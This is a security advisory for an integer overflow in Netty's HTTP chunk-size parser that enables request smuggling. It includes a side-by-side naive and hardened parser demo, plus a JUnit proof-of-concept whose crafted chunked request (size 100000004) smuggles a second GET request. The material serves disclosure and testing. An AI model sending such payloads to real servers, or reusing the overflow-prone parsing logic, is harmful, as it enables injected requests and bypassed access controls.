CVE-2026-42580

ADVISORY - github

Summary

Netty's chunk size parser silently overflows int, enabling request smuggling attacks.

Details

io.netty.handler.codec.http.HttpObjectDecoder#getChunkSize silently overflows int.

The size is accumulated as follows:

result *= 16; result += digit;

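The result is checked only for negative values. However, with a carefully crafted chunk size, the accumulation wraps around past the int range and lands on a small non-negative value, which passes the check and is accepted as a valid size. In the PoC below, the hex size 100000004 wraps to 4.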
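The accumulation described above, side by side with an overflow-checked variant, as an added example: this is not Netty's source or the project's patch. The class and method names are hypothetical, and the parser is narrowed to bare hex digits (no whitespace or chunk extensions).

```java
public class ChunkSizeOverflowDemo {
    // Illustration only, not Netty's source. Mirrors the accumulation the advisory
    // describes: multiply, add, reject only when the running value is negative.
    static int naiveChunkSize(String hex) {
        int result = 0;
        for (int i = 0; i < hex.length(); i++) {
            int digit = hexDigit(hex.charAt(i));
            result *= 16;      // may wrap past Integer.MAX_VALUE without any error
            result += digit;
            if (result < 0) {
                throw new NumberFormatException("chunk size overflow: " + hex);
            }
        }
        return result;
    }

    // Hardened variant (assumed fix): refuse the digit before it can overflow.
    static int strictChunkSize(String hex) {
        int result = 0;
        for (int i = 0; i < hex.length(); i++) {
            int digit = hexDigit(hex.charAt(i));
            if (result > (Integer.MAX_VALUE - digit) / 16) {
                throw new NumberFormatException("chunk size overflow: " + hex);
            }
            result = result * 16 + digit;
        }
        return result;
    }

    static int hexDigit(char c) {
        int digit = c < 128 ? Character.digit(c, 16) : -1;  // ASCII hex only
        if (digit < 0) {
            throw new NumberFormatException("not a hex digit: " + c);
        }
        return digit;
    }

    public static void main(String[] args) {
        // "100000004" is the chunk size from the PoC; the others are constructed.
        for (String size : new String[] {"4", "7FFFFFFF", "80000000", "100000004"}) {
            String naive, strict;
            try { naive = String.valueOf(naiveChunkSize(size)); }
            catch (NumberFormatException e) { naive = "rejected"; }
            try { strict = String.valueOf(strictChunkSize(size)); }
            catch (NumberFormatException e) { strict = "rejected"; }
            System.out.println(size + " -> naive=" + naive + ", strict=" + strict);
        }
    }
}
```

The negative-only check does catch 80000000, because the wrap lands on a negative value, but 100000004 wraps to 4 and is accepted by the naive parser while the strict parser rejects it.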

PoC

The test below shows Netty successfully parsing the second request, demonstrating how an attacker can smuggle a second request inside a chunked body.

@Test
public void test() {
    String requestStr = "POST / HTTP/1.1\r\n" +
            "Host: localhost\r\n" +
            "Transfer-Encoding: chunked\r\n\r\n" +
            "100000004\r\n" + // chunk size 0x100000004 does not fit in an int
            "test\r\n" +
            "0\r\n" +
            "\r\n" +
            "GET /smuggled HTTP/1.1\r\n" +
            "Host: localhost\r\n" +
            "Content-Length: 0\r\n" +
            "\r\n";

    EmbeddedChannel channel = new EmbeddedChannel(new HttpRequestDecoder());
    assertTrue(channel.writeInbound(Unpooled.copiedBuffer(requestStr, CharsetUtil.US_ASCII)));

    // Request 1
    HttpRequest request = channel.readInbound();
    assertTrue(request.decoderResult().isSuccess());
    HttpContent content = channel.readInbound();
    assertTrue(content.decoderResult().isSuccess());
    assertEquals("test", content.content().toString(CharsetUtil.US_ASCII));
    content.release();
    LastHttpContent last = channel.readInbound();
    assertTrue(last.decoderResult().isSuccess());
    last.release();

    // Request 2
    request = channel.readInbound();
    assertTrue(request.decoderResult().isSuccess());
    last = channel.readInbound();
    assertTrue(last.decoderResult().isSuccess());
    last.release();
}

Impact

HTTP Request Smuggling: Attacker injects arbitrary HTTP requests

Common Weakness Enumeration (CWE)

Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')

